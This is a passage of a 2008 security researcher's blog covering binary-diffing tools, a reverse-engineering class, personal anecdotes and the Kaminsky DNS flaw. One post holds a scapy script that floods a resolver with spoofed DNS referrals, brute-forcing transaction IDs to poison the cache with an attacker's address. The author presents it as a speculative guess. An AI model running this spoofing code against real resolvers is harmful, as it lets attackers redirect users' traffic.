Friday, December 26, 2008

TAOSSA blog post I didn't see but will comment on :-)

http://taossa.com/index.php/2008/10/13/bugs-vs-flaws/#more-83

I hadn't seen this post before, and I would like to comment on it (mainly because commenting on his blog post might be the easiest way of getting into a conversation with Mr. McDonald these days ;), but I don't have time right now. Hopefully I'll get to it later this week.

Sometimes, diffing can remove obfuscation (albeit rarely)

Hey all,

apologies for the sensationalist title, but I found another amusing example today where the same function was present in two different executables -- in two differently obfuscated forms. Amusingly, DiffDeluxe identified the "common components" between these two functions, effectively removing a lot of the obfuscation.


While this is clearly not a typical case, it nonetheless made me smile.

Merry Christmas everyone !

Saturday, November 15, 2008

A good protocol attack ...

... is like a good joke. This one, while requiring special circumstances to succeed with high probability, was responsible for a lot of laughter on my side.

Tuesday, November 11, 2008

BinDiff / BinNavi User Forum

Hey all,

we have re-activated the BinDiff / BinNavi User Forum under

https://zynamics.fogbugz.com/default.asp?BinNavi
https://zynamics.fogbugz.com/default.asp?BinDiff


There is not a whole lot there at the moment, but that should change soon :)

Malicious Office/PDFs

Hey all,

for some research that I'm doing, I'm looking for a collection of malicious Office/PDF documents. If anyone has such documents (e.g. because he was targeted in an attack, or because he found one somewhere), I'd much appreciate submissions ! :)

Monday, November 10, 2008

BinNavi v2 and PHP !

Hey all,

we have written about the SQL storage format for BinNavi quite a few times on this blog, and how we'd like to encourage third parties to use it. I am quite happy to say that Stefan Esser of
SektionEins GmbH has built code to export PHP byte code into the database format. The (cute) results can be seen under

http://www.suspekt.org/2008/11/05/php-bytecode-in-binnavi-20/

Saturday, November 08, 2008

German ways of expressing optimism

One of my favourite things when travelling and interacting with people from other cultures is observing differences in conversational conventions -- and (most importantly) different forms and perceptions of "conversational humor". Aside from comedic protocol screw-ups (e.g. literally translating an essentially untranslatable expression into another language, earning -- at best -- puzzled looks and -- at worst -- thoroughly offending the conversation partner), it often provides interesting insights into one's own culture and habits.

This week's special: German forms of expressing optimism.

There are many expressions in German that are horribly difficult to translate.

One of my favourites, and a reliable source of confusion, is the German custom of wishing people luck upon parting by wishing them "Hals- und Beinbruch!" (literally: 'broken neck and broken leg'), 'Kopf- und Bauchschuss' (literally: 'shot in the head and stomach') or (for sailors) 'Mast- und Schotbruch' (literally: 'broken mast and ripped sail').
A common reply to this would be "wird schon schiefgehen" (literally: 'I have no doubt it's going to go badly'). Counterintuitively, the semantics are optimistic -- i.e. whoever says that things are going to turn out badly indicates by this that he is not worried, and that he actually expects that things will be fine.

In essence, one expresses optimism by claiming that an improbably horrible outcome is a near-certainty.

Even though I try hard not to have an all-too-obvious German accent any more, I catch myself using the above pattern all the time, even though it does not translate. I (deservedly) earned puzzled looks today by clumsily attempting to use the following German saying to indicate my optimism about the future:

"Lächle und sei froh, sagten sie mir, denn es könnte schlimmer kommen. Und ich lächelte und war froh, und es kam schlimmer."

This has a certain elegance in German, which is totally lost in my clumsy translation:

"Smile and be happy, they told me, because things could be a lot worse. So I smiled and was happy, and things got a lot worse."

Aside from the clumsiness of the translated expression, the semantics (i.e. the intention to express optimism) were completely lost -- the effect was a puzzled and slightly worried look from my conversation partner. I think it is in situations like these that Germans earn their bad reputation for being thoroughly unfunny.

Another thing that is good for causing confusion between a native English speaker and someone from the German-speaking world is the difference in acceptable replies to the question "How are you ?". The usual form of this in German is "Wie gehts ?", essentially "How is it going ?". In the English-speaking world, acceptable replies seem to be restricted to "good", "good good", or "great".

Proper replies to the question "How is it going" over here would be:
"Muss." -- literal translation: 'it has to somehow'
"Naja, ganz ok." -- 'well... ok ...'
"Könnte schlechter/besser gehen" -- 'could be worse/better'
"Bergauf" or "Bergab" -- uphill / downhill

If the other party feels inclined to have a longer chat, they could reply with
"Yesterday, we stood on a cliff. Today we have advanced by a significant step."
or "Katastrophe". This is usually followed with a short anecdote or complaint about something work-related. From a social perspective, this does wonders as an ice-breaker.

Whenever I catch myself in such a situation, I realize that no matter how much one travels, and no matter how much time one spends in a different cultural climate, certain components of the social interaction are nigh-impossible to change.

Anyhow, time to go to sleep.

Sunday, October 26, 2008

The joys of the Volkswagen Caddy Natural Gas car

So I do own a car (contrary to what most people expect). About a year ago, I bought a VW Caddy EcoFuel. It runs on natural gas in normal mode and only uses the gasoline tank for starting (and when the natural gas has run out).

Up until 4 weeks or so ago I was pretty happy with it, but one morning, the car refused to start unless I hit the gas heavily while starting. I brought the car to the repair shop that belongs to the same place where I bought the car. After a few days of tinkering, they told me that
  1. The particular car I own doesn't lock the tank when the rest of the car is locked and
  2. Somebody poured an unidentifiable liquid into my tank causing the problems
  3. Because this is not a problem with the car itself, warranty doesn't cover it
  4. Removing the tank and the fuel pump and cleaning everything is going to cost 1200 EU
I am somewhat annoyed by some punk pouring an unidentifiable liquid into my tank and agree to pay the money. I also ask for the shop to retain a sample of the tank contents so I can at least find out what was poured into the tank, and perhaps get money back from my insurance.

They agree. When I come to pick up the car, the guys at the shop for some bizarre reason cannot find the sample. I sit and wait for ~1 hour, and they finally produce an unlabelled can from somewhere. Ok. I ask them to sign a piece of paper certifying that this sample is coming from my tank, and they tell me they will send it to me via regular mail the next day. So far so good.

So two weeks pass, and I call back 3 times for that piece of paper. At the beginning of the third week, I have to take my guinea pigs to the vet in the morning (yes, I don't only own a car, I also have guinea pigs). On my way back from the vet, the natural gas runs out, and the car switches to gasoline mode -- while I am going about 130km/h with a large truck behind me. The only complication: My engine switches off. Awesome.

So I manage to stop the car safely on the side of the autobahn and get towed to the next Volkswagen shop. About 2 hours after I leave my car there, I get a call from the repair guy there, telling me that they can see in the VW database which repairs were done on my car recently, but from what they can tell, these repairs never happened. They call in an expert that is certified to appear in court to take pictures & write a report, and he also confirms: The tank was never removed, the gasoline pump never replaced, and the 1200 EU were apparently charged without any of the stuff ever happening.

Clearly, I am somewhat surprised. To my dismay, I am also told that the actual repairs will cost about 2000 EU, and that there is still unidentified stuff in my tank.

So all in all, I am currently stuck with
  1. 1200 EU for repairs that never happened
  2. 2000 EU for repairs that are happening now
  3. 2 * 300 EU for chemical analysis of the two samples taken
  4. unspecified legal costs (most likely covered by my insurance) to deal with the situation
All in all, I am quite dissatisfied with VW on this front -- IMO they should've warned me that the tank doesn't lock, and they shouldn't have "VW Certified Repair Shops" that appear to attempt to defraud customers. I have trouble imagining that not actually performing the repairs was an "honest mistake" (although I usually live by the motto that "one should not attribute anything to malice that can be attributed to incompetence").

Anyhow, let's see how this plays out. As if I don't have other stuff to do.

Wednesday, October 15, 2008

For those playing with the printer bug...

... I can't help but post this small PNG. And since blogger rescales/blurs the picture, here is a link to the "full" one.

Sunday, October 05, 2008

My bro's comments on the financial crisis

My brother wrote an article injecting some reality into the discussion about the banking crisis on Spiegel Online. The German version can be seen here. I'll share a short summary of his arguments here (and he'll complain about my distortions later ;).

Short version: The article describes why the situation is less dire than many pundits claim, and explains logical fallacies in commonly-heard arguments.

In the following, here's a summary of his arguments, in the form of "Myth --> Reality"
  1. The US government is taking on a total of 7000bn in liabilities -- about 5500bn by agreeing to step in for Fannie Mae / Freddie Mac, and about 700bn in papers bought as part of the bailout. This equates to roughly half of US GDP, and since the US is already in debt by about 65% of GDP, this would push the total indebtedness of the US clearly past 100% of GDP. As a result, serious doubts would have to be cast on the US government's ability to repay debts and service interest on debt.
    Reality: Most of the 5500bn are backed by "proper" mortgages of decent quality. It is unclear whether the US government will lose money on the Fannie Mae / Freddie Mac deal at all. Even the 700bn in "toxic assets" the US is willing to buy have some underlying value. Realistic expectations for the total loss to the US government in this deal run in the area of 500bn, which would be less than 3% of GDP -- and therefore not a significant source of problems.
  2. The liquidity that central banks are injecting into the markets should lead to hyperinflation. Reality: The measures to help liquidity in the markets do not increase the money supply in the long run. They are usually short-term credits given to struggling banks for a limited amount of time -- weeks or months. After this time, the borrowing banks have to repay the loans, and the money disappears. At the same time, the willingness of existing banks to lend decreases, thus decreasing the money supply in the economy. The statistics published by central banks show that the actual money supply M2 is growing a lot more slowly at the moment in spite of all the liquidity injections. Since the money supply is only growing very slowly at the moment, the inflationary pressures are low.
  3. The banking crisis is responsible for the overall slowdown in the EU's economy, and the German government is thus not responsible for having to adjust their growth estimates downwards sharply.
    Reality: Most indicators show that the slowdown started way before the crisis reached its current urgency. The indicators started pointing down much earlier as a result of the heavy increase in energy costs, the appreciation of the euro (and the resulting loss in competitiveness), and Germany's botched reform of accounting rules for writing down investments in equipment. The banking crisis is just the latest "kick" -- but the three previous ones were all known early (and could've been partially corrected).
  4. This is the mother of all financial crises -- the worst banking crisis in several generations, going back to the crash of the 1930s. Reality: Dramatic banking crises are more common than we think. Since 1970, the IMF has counted 42 crashes in countries like Argentina, Indonesia, China, Japan, Finland or Norway. In comparison to these crises, the current crisis isn't even very deep or expensive: The Paulson bailout comes at a cost of 700bn, not even 5% of GDP, and only a fraction of this will actually be lost. According to the IMF, the average banking crisis in a country came at a cost of 13% of GDP for that country's taxpayers; the Indonesian crisis even came in at four times this. The big difference to the other crises is that this one has caught on in the world's biggest economy, and as such reaches unknown dimensions in absolute terms.

Wednesday, October 01, 2008

A few things I forgot to mention :-)

Hey all,

I forgot to mention a few things in the previous post:
  1. We're going to release BinDiff v2.1 on the 15th of October 2008. This is still the "old" diffing engine, albeit with a number of speed & reliability improvements.
  2. We're going to release BinNavi v2.0 on the 15th of October 2008. The number of new features in this release is huge -- it's really quite significant. You can read about it in detail on SP's blog.
    I will post some more information myself in the next days. Just a few mouth-watering keywords: Plugin API to extend Navi from Java/JRuby/Jython/JavaScript, built-in intermediate language, hierarchical tagging / namespaces for structuring large disassemblies, cross-module-graphing, managing multiple address spaces in one project, many user interface improvements, faster IDA->SQL export etc. etc. etc.
  3. The DiffDeluxe engine will be part of the next BinDiff release thereafter, probably no later than February 2009. If you are an existing BinDiff customer and would like to try the DiffDeluxe engine in order to provide us with feedback, do not hesitate to contact us -- it's available for testing now. We're especially interested in finding instances where DiffDeluxe performs worse than BinDiff v2.1: Switching the core diffing engine is a significant change, and I would hate to be unaware of any instances where the new engine is worse than the old one.

Monday, September 29, 2008

Improving Binary Comparison (and its implications for malware classification)

I am at Virus Bulletin in Ottawa -- if anyone wants to meet to see our new stuff, please drop mail to info@zynamics.com ! :)

It has been a while since I posted here -- partially because I had a lot of work to finish, partially because, after having finished all this work, I took my first long vacation in a ... very long while.

So I am back, and there are a number of things that I am happy to blog about. First of all, I now have in writing that I am officially an MSc in Mathematics. For those that care about obscure things like extending the Euclidean algorithm to the ring of Boolean functions, you can check the thesis here:
http://www.zynamics.com/files/Diplomarbeit.Thomas.Dullien.Final.pdf

For those that are less crazy about weird computational algebra: Our team here at zynamics has made good progress on improving the core algorithms behind BinDiff further. Our stated goal was to make BinDiff more useful for symbol porting: If you have an executable and you suspect that it might contain a statically linked library for which you have source access (or which you have analyzed before), we want BinDiff to be able to port the symbols into the executable you have, even if the compiler versions and build environments differ significantly, and even if the versions of the library are not quite the same.

Why is this important ? Let's say you're disassembling some piece of network hardware, and you find an OpenSSL string somewhere in the disassembled image. For example, let's say you're disassembling an old PIX image (6.34 perhaps) and see the string

OpenSSL 0.9.5a 1 Apr 2000

This implies that PIX contains OpenSSL, and that the guys at Cisco probably backported any fixes to OpenSSL to the 0.9.5a version. Now, it would be fantastic if we could do the following: Compile OpenSSL 0.9.5a with full symbols on our own machine, and then "pull-in" these symbols into our PIX disassembly.

While this was sometimes possible with the BinDiff v2.0 engine (and v2.1, which is still essentially the same engine), the results were often lacking in both speed and accuracy. A few months back, Soeren and I went back to the drawing board and thought about the next generation of our diffing engine -- with specific focus on the ability to compare executables that are "far from each other", that differ significantly in build environments etc. and that only share small parts of their code. The resulting engine (dubbed "DiffDeluxe" by Soeren) is significantly stronger at this task.

Why did the original BinDiff v2 engine perform poorly ? There are a number of reasons for this, but primarily the devastating impact that a "false match" can have on further matches in the diffing process, and the fact that in the described scenarios, most of the executable is completely different, and only small portions match. The old engine had a tendency to match a few of the "unrelated components" of each executable, and these initial incorrect matches led to further bad matching down the road.

This doesn't mean the BinDiff v2 engine isn't probably the best all-round diffing engine you can find (I think it is, even if some early builds of the v2.0 suffered from silly performance issues -- those of you that are still plagued by this please contact support@ for a fix !) -- but for this particular problem some old architectural assumptions had to be thrown overboard.

Anyhow, to cut a long story short: While the results generated by DiffDeluxe aren't perfect yet, they are very promising. Let's follow our PIX/OpenSSL scenario:

DiffDeluxe operates with two "fuzzy" values for each function match: "Similarity" and "Confidence". Similarity indicates how successful the matching algorithm was in matching basic blocks and instructions within the two functions, and confidence indicates how "certain" DiffDeluxe is that this match is a correct one. This is useful for sorting the "good" and "bad" matches, and for inspecting results before porting comments/names. Anyhow, let's look at some high-confidence matches:

[screenshot omitted]

Well, one doesn't need to be a rocket scientist to see that these functions match. But in many situations, the similarity between two functions is not 100% evident: The following is a matched function with only 72% similarity (but 92% confidence):

[screenshot omitted]

So what is the overall result ? Out of the 3977 functions we had in libcrypto.so, we were able to match 1780 in our Pix disassembly -- but with a big caveat: A significant number of these have very low similarity and confidence scores. This isn't surprising: The differences between the compiler used to build our Pix image (sometime 6 years ago ?) and the compiler we used (gcc 4.1, -O3) are drastic. All in all, we end up with around 250 high-confidence matches -- which is not too bad considering that we don't know how many functions from OpenSSL the Pix code actually contains.

In order to get a clearer idea of how well these algorithms perform, we need an example where we know that essentially the entire library has been statically linked in. For this, luckily, we have Adobe Reader :-)

With all the Adobe patches coming up, let's imagine we'd like to have a look at the Javascript implementation in Acrobat Reader. It can be found in Escript.api. Now, I always presume that everybody else is as lazy as me, so I can't imagine Adobe wrote their own Javascript implementation. But when Adobe added Javascript to Acrobat Reader, there were few public implementations of Javascript around -- essentially only the engine that is nowadays known as "SpiderMonkey", i.e. the Mozilla Javascript engine. So I compiled SpiderMonkey into "libjs.so" on my Linux machine and disassembled Escript.api. Then I ran DiffDeluxe. The result:

Escript contains about 9100 functions, libjs.so contains about 1900. After running the diff, we get 1542 matches. Let's start verifying how "good" these matches are. As discussed above, DiffDeluxe uses a "similarity" and "confidence" score to rate matches. We get 203 matches with similarity and confidence above 90% -- for these functions, we can more or less blindly assume the matches are correct. If we have any doubts, we can inspect them:

[screenshots of the matched functions omitted]

Well, there is little question that this match was accurate.

The interesting question is really: How low can we go similarity- and confidence-wise before the results start deteriorating too badly ? Let's go low -- for similarities below 40%. For example the js_ConcatStrings match.

[screenshot of the js_ConcatStrings match omitted]

Manual inspection of the screenshot on the right will show that the code performs equivalent tasks, but that hardly any instructions remain identical.

Proceeding further down the list of matches, it turns out that results start deteriorating once both confidence and similarity drop below 0.3 -- but we have around 950 matches with higher scores, i.e. we have successfully identified 950 functions in Escript.api. While this is significantly less than the 1900 functions that we perhaps could have identified, it is still pretty impressive: After all, we do not know which exact version of SpiderMonkey was used to compile Escript.api, and significant changes could have been made to the code.
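
For the curious: the post-processing on my end is roughly the following. This is purely illustrative -- it assumes the matches have been exported as (address in Escript.api, address in libjs.so, name, similarity, confidence) tuples, and all addresses, names and scores below are made up; the actual BinDiff/DiffDeluxe storage format is not shown in this post.

    # Hypothetical sketch: filter and rank DiffDeluxe matches before porting names.
    # Assumes matches were exported as (addr_a, addr_b, name, similarity, confidence).
    def matches_for_porting(matches, min_similarity=0.3, min_confidence=0.3):
        """Keep only matches above both thresholds, most trustworthy first."""
        good = [m for m in matches if m[3] >= min_similarity and m[4] >= min_confidence]
        return sorted(good, key=lambda m: (m[4], m[3]), reverse=True)

    example = [
        (0x2300a010, 0x0804c3f0, "js_ConcatStrings",   0.38, 0.55),  # low similarity, still useful
        (0x230153a0, 0x08051220, "some_jsapi_function", 0.95, 0.97),  # port this one blindly
        (0x23020000, 0x08060000, "unrelated_function",  0.25, 0.20),  # below both thresholds, dropped
    ]
    for addr_a, addr_b, name, sim, conf in matches_for_porting(example):
        print("%08x -> %08x  %s (sim=%.2f, conf=%.2f)" % (addr_a, addr_b, name, sim, conf))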

Clearly, we're a long way from matching 95% -- but we're very close to the 50% barrier, and will work hard to improve the 50% to 75% and beyond :-)

Anyhow, what does all this have to do with automatic classification and correlation of malware ?

I think the drastic differences induced by platform/compiler changes make it pretty clear that statistical measures that do not focus on the structure and semantics of the executable, but on some "simple" measure like instruction frequencies, fail. All the time. Behavioral methods might have a role to play, but they will not help you one bit if you acquire memory from a compromised machine, and they are trivially obfuscated by adding random noisy OS interaction.

I am happy to kill two birds with one stone: By improving the comparison engine, I am making my life easier when I have to disassemble Pix -- and at the same time, I am improving our malware classification engine. Yay :-)

Anyhow, as mentioned above: I am at the Virus Bulletin conference -- if anyone wishes to have a chat or have our products demo'ed, please do not hesitate to send mail to info@zynamics.com.

Thursday, July 31, 2008

My 100th blog post, and why my blog entries never have titles.


Hey all, this is my 100th blog post. And again, it has no title. This is not due to me feeling too cool to provide one, it's simply a matter of my "create" window in blogger not having a title field. I don't know why.

Anyhow, the real reason for the blog post: As of today, I'm done with my exams. Which makes me very happy, and will hopefully mean I will get around to blogging more often.

Friday, July 25, 2008

I think everybody should read FX's excellent post.

Tuesday, July 22, 2008

A few short notes on what's being reported:

It seems that after my previous speculation, a few unforeseen things happened:
  • Apparently, my post, while partially incorrect, was somewhere close to the truth
  • A third party accidentally posted full details on the issue, which corrected my mistakes. Shortly after posting these details, the post was pulled down again, but was archived by search engines (and those that had subscribed to the blog where it was posted).
There have been a number of slightly incorrect press reports which I'd like to clarify:
  • I posted a partially incorrect, but close, guess on what the DNS issue might be. That is not the same as "publishing a reliable way to poison DNS". It is guessing how it might be done.
  • I did not pull down any posts from my blog.
I do not think anything I have posted takes away from Dan's superb work on this issue. Some people are of the opinion that I "stole his thunder" for his Blackhat talk, and I disagree strongly: Dan's talk is a full hour on DNS, and all the interesting things within DNS. My post was a vague guess.

Imagine: A world-renowned particle physics expert decides to give a one-hour lecture in your hometown, and on your way there some guy on the street tells you "I think he will talk about (...30 seconds of physics here...)". Would you decide that listening to the physics expert talk is no longer necessary because the guy on the street told you everything ?

Also: Guessing how something is done, knowing that it can be done, is easy. Dan did the hard part: Coming up with a clever attack in a protocol that is relied on everywhere. My guess doesn't come close to comparing to what Dan has done: He spotted something that everyone else missed beforehand. He also handled the entire situation with a lot of endurance, patience, and determination. We disagree on whether people have a right (or even duty) to discuss what the issue might be, but that doesn't mean that I do not have the greatest respect for Dan. And his talk will contain much more of interest than my silly 30 lines.

I think (German news site) Heise summed it up well:
"In fact, all of Dullien's hunches had already been sketched out the day that US-CERT published a vulnerability note on the security hole."

I guessed. I was close, perhaps closer than others, but no cigar.

Monday, July 21, 2008

On Dan's request for "no speculation please"

I know that Dan asked the public researchers to "not speculate publicly" about the vulnerability, in order to buy people time. This is a commendable goal. I respect Dan's viewpoint, but I disagree that this buys anyone time (more on this below). I am fully in agreement with the entire way he handled the vulnerability (e.g. getting the vendors on board, getting the patches made and released, and I understand his decision not to disclose extra information) except the proposed "discussion blackout".

In a strange way, if nobody speculates publicly, we are pulling wool over the eyes of the general public, and ourselves. Consider the following:

Let's assume that the DNS problem is sufficiently complicated that an average person who has _some_ background in security, but little idea of protocols or DNS, would take N days to figure out what the problem is.
So clearly, the assumption behind the "discussion blackout" is that no evil person will figure it out before the end of the N days.

Let's say instead of having an average person with _some_ background in security, we have a particularly bright evil person. Perhaps someone whose income depends on phishing, and who is at the same time bright enough to build a reasonably complicated rootkit. This person is smart, and has a clear financial incentive to figure this out. I'd argue that it would take him N/4 days.

By asking the community not to publicly speculate, we make sure that we have no idea what N actually is. We are not buying anybody time, we are buying people a warm and fuzzy feeling.

It is imaginable that N is something like 4 days. We don't know, because there's no public speculation.

So in that case, we are giving people 29 days of "Thank us for buying you time.", when in fact we have bought them a false perception of having time. The actual time they have is N/4, and we're just making sure they think that N/4 > 30. Which it might not be. It might be ... 1.

It all reminds me of a strange joke I was told last week. It's a Russian joke that makes fun of the former East German government, so it might not be funny to everyone. I apologize up front: I am both German and a mathematician, so by definition the following can't be funny.

"Lenin travels with the train through Russia, and the train grinds to a halt. Engine failure. Lenin sends all workers in the factory that might be responsible to a labor camp.

Stalin travels with the train through Russia a few years later, and the train grinds to a halt. Engine failure. Stalin has all workers in the factory that might be responsible shot.

Honecker (the former head of State of the GDR) travels with the train through Russia. The train grinds to a halt. Engine failure. Honecker has a brilliant idea: "The people that are responsible should be forced to rock the train, so we can sit inside and feel like it is still running." "

It feels like we're all trying to rock the train.

If there was public speculation, we'd at least get a lower bound on the "real" N, not the N we wish for.

So I will speculate.

For the last few weeks I was in the middle of preparing for an exam, so I really didn't have time to spend on the DNS flaw. I couldn't help myself though, and spent a few minutes every other evening or so reading a DNS-for-dummies text. I have done pretty much no protocol work in my life, so I have little hope of having gotten close to the truth.

As such, anyone with a clue will probably laugh at my naive ideas. Here's my speculation:

Mallory wants to poison DNS lookups on server ns.polya.com for the domain www.gmx.net. The nameserver
for gmx.net is ns.gmx.net. Mallory's IP is 244.244.244.244.

Mallory begins to send bogus requests for www.ulam00001.com, www.ulam00002.com ... to ns.polya.com.
ns.polya.com doesn't have these requests cached, so it asks a root server "where can I find the .com NS?"
It then receives a referral to the .com NS. It asks the nameserver for .com where to find the nameserver for ulam00001.com, ulam00002.com etc.

Mallory spoofs referrals claiming to come from the .com nameserver to ns.polya.com. In these referrals, it says that the nameserver responsible for ulamYYYYY.com is a server called ns.gmx.net and that this server is located at 244.244.244.244. Also, the time to live of this referral is ... long ...

Now eventually, Mallory will get one such referral spoofed right, i.e. the TXID etc. will be guessed properly.

ns.polya.com will then cache that ns.gmx.net can be found at ... 244.244.244.244. Yay.

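To make my speculation a bit more concrete, here is a rough sketch of the packet Mallory would be spoofing, written with scapy. This is just the guess above rendered as code, not a working attack: the names and IPs are the made-up ones from the text, and TXID guessing odds, timing, and the fact that the response has to hit the resolver's outgoing query port are all glossed over.

    # Purely illustrative sketch of the spoofed referral described above (scapy).
    from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, send

    victim_resolver = "10.0.0.53"        # ns.polya.com (made-up address)
    com_nameserver  = "192.5.6.30"       # a .com gTLD server (example address)
    mallory_ip      = "244.244.244.244"  # Mallory

    for txid in range(0, 65536):          # brute-force the transaction ID
        spoofed = (
            IP(src=com_nameserver, dst=victim_resolver)
            / UDP(sport=53, dport=53)      # dport would really be the resolver's query port
            / DNS(id=txid, qr=1,
                  qd=DNSQR(qname="www.ulam00001.com"),
                  # the poisonous referral: "ulam00001.com is served by ns.gmx.net ..."
                  ns=DNSRR(rrname="ulam00001.com", type="NS", ttl=604800,
                           rdata="ns.gmx.net"),
                  # ... "and ns.gmx.net lives at Mallory's address" (note the long TTL)
                  ar=DNSRR(rrname="ns.gmx.net", type="A", ttl=604800,
                           rdata=mallory_ip)))
        send(spoofed, verbose=0)
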
The above is almost certainly wrong. Can someone with more insight into DNS tell me why it won't work ?

Sunday, July 13, 2008

*Blogspam*
Advanced Reverse Engineering Trainings Class

We still have a number of seats in our advanced RE class available. The class
will be held on the following three days:
  1. Wednesday the 1st of October
  2. Thursday the 2nd of October
  3. Friday the 3rd of October
The class will be held in Frankfurt(Main) in Germany.
The class is limited to 17 students and will cover a lot of interesting ground. Amongst the things we will be teaching are:
  • What a C++ compiler does and how to recognize these things in a binary:
    • How to recover classes and inheritance,
    • What templates will do in the binary
    • Using the helping hand of MS RTTI to recover classnames and generate inheritance diagrams from the binary
  • Getting the most out of the RE-DB SQL schema -- storing disassemblies in a uniform way in a database
  • Differential debugging and isolation of security-critical features (e.g. "where in the world is the encryption code again ?")
  • Crafting malicious input to reach target program locations
  • Working on network infrastructure:
    • Loading ROM images into IDA: IOS, Netscreen etc.
    • Generic methods of identifying the base address
    • Debugging IOS (and other network infrastructure) using BinNavi and the GDB protocol
  • Using BinDiff to full advantage:
    • Patch Diffing
    • Porting comments & names
    • Porting symbols of statically linked libraries (such as OpenSSL) back into your disassembly
  • A reverse engineer's guide to static analysis:
    • The reverse engineering intermediate language REIL
    • Monotone frameworks, lattices, and fun things to do with them
  • Lots and lots of fun things to do with Python
The class will be taught by me (Halvar Flake), Ero Carrera, and Felix 'Fx' Lindner.

The class will be held in a small hotel called "Villa Orange" -- which has about 20 rooms, so usually the entire hotel consists of reverse engineers.

For more info, visit
http://www.zynamics.com/index.php?page=trainings

Cheers,
Halvar
PS: It might be of interest to some readers that the Oktoberfest runs from the 20th of September to the 5th of October this year -- this means you can attend the Oktoberfest either before or after the trainings class (although we recommend the latter).
*End of Blogspam*
Hey all,

> Supplemental note to Halvar & everybody else who has said, in effect, "this
> is why SSL was invented" -- there's more to internet security than the route
> from your computer to your online bank. Have you thought about what this
> bug implies for NTLM? Or every virgin OS installation on the planet? Or
> Google's entire business model?

just to clarify: I did not say this bug wasn't relevant, and I don't want my blog post to be construed
in that manner. What I did say was:

  1. The average user always has to assume that his GW is owned, hence nothing changes for him. Specifically: He does not need to worry more than usual. Check SSL certificates, check host fingerprints. Don't use plaintext protocols.
  2. For those providing DNS services, it is clearly preferable to patch. A DNS system without trivial poisoning is preferable to one with trivial poisoning.
  3. In living memory, we have survived repeated Bind remote exploits, SSH remote exploits, a good number of OpenSSL remote exploits etc. -- I argue that the following inequality holds:
  4. OpenSSL remote >= OpenSSH remote > Bind remote > easy DNS poisoning
  5. I argue this because the left-hand side usually implies the right-hand side given some time & creativity.
The net has survived much worse.

So I guess the summary is: Good find, definitely useful for an attacker, but we have survived much worse without a need for the great-vendor-coordination jazz.

Cheers,
Halvar
PS: I am aware that my sangfroid could be likened to that of a Russian roulette player who, after winning 4 games, concludes: "This game clearly isn't dangerous."
PPS: It seems that we will find many more critical issues in DNS over the next weeks - it's the first time in years that a significant number of people are looking at the protocol / implementations.

Thursday, July 10, 2008

All this DNS ...

I am taking a very brief break from my books to write a few thoughts about this entire DNS thing that everybody seems to be writing about. And reading all this, I can't help but feel like the only one in the room that doesn't understand the joke.

So Dan Kaminsky found a serious flaw in the implementation of the DNS protocol, apparently allowing DNS cache poisoning. This is good work.

I fail to understand the seriousness with which this bug is handled though. Anybody who uses the Internet has to assume that his gateway is owned. That is why we have SSL, that is why we have certificates, that is why SSH tells you when the host key changes. DNS can never be trusted - you always have to assume that your ISP's admin runs a broken filesharing server on the same box with BIND.

If it were legitimate to operate under the assumption that your gateway is not owned, you would not need SSH, or SSL. If I could operate under the assumption that my gateway wasn't owned, I could TELNET everywhere, and transmit my credit card details in the clear.

I am not saying that Dan's bug doesn't have utility for an attacker -- it's definitely more comfortable/less time consuming to do DNS poisoning than to own the gateway. But for the user, nothing changes, irrespective of whether the patch was applied or not. The basic assumption is always my gateway is controlled by my opponent.

I personally think we've seen much worse problems than this in living memory. I'd argue that the Debian Debacle was an order of magnitude (or two) worse, and I'd argue that OpenSSH bugs a few years back were worse.

So, let's calm down everybody. And I'd even argue that installing the patches is a lot less time-critical (for the user) than in most other scenarios. If you act under the assumption of "my gateway is owned", this should be no risk to you.

Wednesday, July 02, 2008

The security book that I'd like to see written (and which I'd buy)

Good security books are few and far between. But IF someone writes the following book, I'll pre-order it immediately, even if it costs a hundred dollars:

"100 UNIX commands to issue on other people's systems"

Generally, I am horrible at all things *nix, and there are few enough good books around which teach you clever things to do with a shell. Unfortunately, there is no book that teaches people what to do with a shell on someone else's box.

Someone from Matasano told me they'd post their favourite commands if I wrote this blog post - so let's see it ! :)

(I'd like to start this by posting, but honestly -- I wouldn't be asking if I knew anything I'd not be embarrassed about. I mentioned above that I suck at all things *nix)

Saturday, June 28, 2008

The RE-DB database format for storing disassemblies

For those of you that are interested in the disassembly database schema discussed here (amongst other places), there is a mailing list for discussion of it now. More information about the ML:
  http://lists.immunityinc.com/mailman/listinfo/re-db

Sunday, June 15, 2008

Intuition, Experience, and the value of getting Pwned

The following is to be taken mostly proverbially. Names have been changed, primarily to protect my bruised ego.

There are few things that I hate more than looking stupid or incompetent. At the same time I like trying new things (and this rarely happens without falling flat on your face a couple of dozen times). As a result, I usually do not advertise that I do something before I have gained some confidence that I am at least not significantly worse than average.

So tonight, I had my first free evening in a few weeks. I decided I'd go follow one of my not-publicly-advertised hobbies. I found a place to go, and thought that I was good enough to play.

I got pwned, and it wasn't pretty.

There are many different ways of competing and losing. Whenever this happens, it happens with a certain "delta" -- the skill gap between you and your opponent(s). Small deltas usually trigger a reaction of "get up, try again" in me.

Tonight, the delta between me and the weakest competitor was such a gulf that - within minutes - it was clear that I should practice a few more years before I contemplate coming back. I will not even describe what the delta between me and the stronger competitors was.

Getting knocked down has one great benefit: After you have been knocked down and realized that there is no sense in getting up quickly, you have a few minutes of extraordinary calm to contemplate the situation - your skill level, your competitors' skill level, the value of experience and intuition.

No matter how much work you put into something, and no matter how much talent you have, intuition and experience have tremendous value. And they are nigh-impossible to teach, and to accumulate quickly.

What is intuition ? What is its relation to experience ?

Intuition is what one bases decisions on when knowledge fails. In any field, there are situations where decisions have to be made with very imperfect and incomplete information. Intuition is what we rely on when we don't know anything.

Intuition is usually based on experience - but whereas one can easily talk about "experiences" (they can be recalled usually), talking about the reasoning behind an intuition is often difficult. If one believes in the theory of two brain hemispheres, intuition lives deeply in the nonverbal part of your brain.

When I teach classes, or do collaborative code audits, or when I do some sorts of math, I end up in situations where I have a "feeling" about how things "should" be. This feeling is both tremendously useful and horribly frustrating for students and coworkers. The difficulty of verbalizing all the bits that feed an intuition makes it difficult to follow.

If someone has sufficient experience in a field, some of the things he does seem like magic. My competitors this evening clearly did things I had never seen before, and did so quite well.

Perhaps a skill can be described as a simple real-valued function.

Your innate talent and your work investment influence the slope, and the value of the function at a particular point tells you your current direct "knowledge" of a field. Intuition must then be something that is based on the accumulated area under the curve.

In many situations, it might be possible to catch up with someone experienced on a particular topic in a limited timeframe - but catching up with the value of your "function" is only half the game. You'll have to outperform someone for quite a while before your accumulated "area" exceeds his.
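
Stated with mock precision (this is just the previous paragraphs rewritten in symbols, nothing more):

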